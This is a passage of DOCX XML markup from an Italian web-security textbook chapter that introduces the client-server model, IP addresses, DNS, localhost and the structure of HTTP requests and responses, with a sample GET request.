        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">un’applicazione web. È il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ponte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fra i corsi paralleli che stai seguendo (Programmazione, Basi di Dati, Reti) e i capitoli sugli attacchi e sulle difese che inizieranno dal </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Non è un capitolo da saltare anche se</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sai già queste cose</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ogni concetto è inquadrato dalla prospettiva della sicurezza, e i dettagli che a Programmazione passano in secondo piano (esattamente come è fatta una richiesta HTTP, come funziona davvero un cookie) qui sono il cuore della materia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="107" w:name="il-modello-client-server"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="468" w:name="sec_3_1"/>
      <w:r>
        <w:t xml:space="preserve">3.1 Il modello client-server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="468"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando apri il browser e digiti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId37">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.repubblica.it</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, sembra un’azione semplice: in un secondo appare il sito. In realtà sotto questa apparente semplicità avvengono almeno una dozzina di passaggi, e capirli è fondamentale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tutto si basa su uno schema chiamato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">modello client-server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sono coinvolti due programmi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">client</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il programma che fa la richiesta. Nel caso del web, il client è quasi sempre il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">browser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Chrome, Firefox, Edge). Ma può essere anche un’app sul telefono, uno script in Python che scarica dati, un altro programma server che parla con questo come se fosse il suo cliente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il programma che riceve la richiesta, la elabora e risponde. È un programma che gira giorno e notte su una macchina connessa a internet, in attesa di richieste.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Server = computer? Non esattamente.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Nel linguaggio comune si chiama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la macchina fisica (il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">computer del data center</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), ma in senso tecnico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">server è il programma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non l’hardware. Su una stessa macchina possono girare contemporaneamente decine di programmi server diversi (un server web, un server di posta, un server database). Quando parliamo di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nei prossimi capitoli intendiamo quasi sempre il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">programma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un’analogia: un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">call center</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Quando chiami il numero di assistenza di una banca, parli con un operatore (il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) che siede in un ufficio (la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">macchina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) condiviso con altri colleghi (altri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Tu, dal tuo telefono di casa (il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">client</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), formuli una richiesta (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vorrei sapere il saldo del mio conto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), l’operatore la elabora consultando il suo computer (il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), e ti risponde. Per ogni telefonata si crea uno scambio richiesta-risposta. Quando riattacchi, l’operatore è libero di rispondere a un’altra chiamata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Allo stesso modo, ogni volta che il browser chiede una pagina, parte una richiesta verso il server, il server elabora, risponde, e poi è pronto per la richiesta successiva (anche di un altro client). Migliaia di client diversi possono parlare con lo stesso server contemporaneamente.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="106" w:name="indirizzi-ip-nomi-di-dominio-dns"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Indirizzi IP, nomi di dominio, DNS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il client deve sapere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dove</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">si trova il server. In internet, ogni macchina connessa è identificata da un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">indirizzo IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: una sequenza di numeri come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">93.184.216.34</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(per IPv4, la versione più diffusa). È l’equivalente di un numero di telefono: serve per stabilire la comunicazione, ma è scomodo da ricordare.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per questo esistono i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nomi di dominio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">www.repubblica.it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">github.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python.org</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sono nomi leggibili che corrispondono, dietro le quinte, a indirizzi IP. La traduzione da nome a IP è effettuata dal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Name System</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), una rete di server distribuiti in tutto il mondo che funzionano come un gigantesco elenco telefonico.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando digiti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">www.repubblica.it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, il browser fa una rapida domanda a un server DNS —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">qual è l’indirizzo IP di www.repubblica.it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— riceve la risposta, e solo a quel punto può inviare la richiesta vera e propria.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 e localhost.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Hai già visto nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_0" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> l’indirizzo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(chiamato anche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">localhost</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). È un indirizzo IP speciale: significa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">questa stessa macchina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Quando avvii Flask sul tuo computer e ti colleghi a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, il browser sta parlando con un server che gira sulla tua stessa macchina. Non c’è alcuna comunicazione di rete verso l’esterno. È perfetto per lo sviluppo: puoi testare un’applicazione senza pubblicarla davvero su internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="106"/>
    <w:bookmarkEnd w:id="107"/>
    <w:bookmarkStart w:id="111" w:name="http-il-protocollo-del-web"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="469" w:name="sec_3_2"/>
      <w:r>
        <w:t xml:space="preserve">3.2 HTTP: il protocollo del web</w:t>
      </w:r>
      <w:bookmarkEnd w:id="469"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sappiamo che il browser parla col server. Ma in che lingua? Con quali regole? La risposta è:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">HyperText Transfer Protocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Protocollo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">= un insieme di regole condivise che permette a due interlocutori di capirsi. La cortesia che impone di rispondere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">buongiorno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">buongiorno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è un protocollo sociale. Le regole rigide con cui un controllore di volo parla con un pilota sono un protocollo di sicurezza aerea. HTTP è un protocollo informatico: dice esattamente come un client deve formulare una richiesta a un server e come il server deve formulare la risposta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP è stato inventato nel 1991 da Tim Berners-Lee al CERN di Ginevra ed è la base di tutto il web. Le applicazioni cambiano, i framework cambiano, i linguaggi cambiano: HTTP è rimasto, in versioni evolute (HTTP/1.1 dal 1999, HTTP/2 dal 2015, HTTP/3 dal 2022). Ai nostri fini di sicurezza, le differenze fra le versioni sono trascurabili: il modello logico è sempre lo stesso.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="108" w:name="anatomia-di-una-richiesta-http"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anatomia di una richiesta HTTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una richiesta HTTP è un blocco di testo strutturato che il client invia al server. È composta da quattro parti:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Riga di richiesta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">metodo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(verbo, es.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">percorso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">della risorsa richiesta, la versione del protocollo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Intestazioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in inglese</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">headers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): coppie chiave-valore che danno informazioni aggiuntive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Riga vuota</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che separa intestazioni da corpo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Corpo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in inglese</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">body</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): contenuto opzionale della richiesta (presente per esempio quando invii un modulo di registrazione)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempio reale di una richiesta HTTP che il browser potrebbe inviare quando visiti la pagina principale di un sito:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /index.html HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: www.esempio.it</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept: text/html,application/xhtml+xml,application/xml</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept-Language: it-IT,it;q=0.9,en;q=0.8</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie: session_id=a1b2c3d4e5f6</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(la riga vuota in fondo è importante; il body in questo caso è assente perché è una semplice GET).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="108"/>
    <w:bookmarkStart w:id="109" w:name="anatomia-di-una-risposta-http"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anatomia di una risposta HTTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La risposta del server ha struttura speculare:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Riga di stato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la versione del protocollo, il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">codice di stato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(es.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">200</w:t>
      </w:r>
      <w:r>
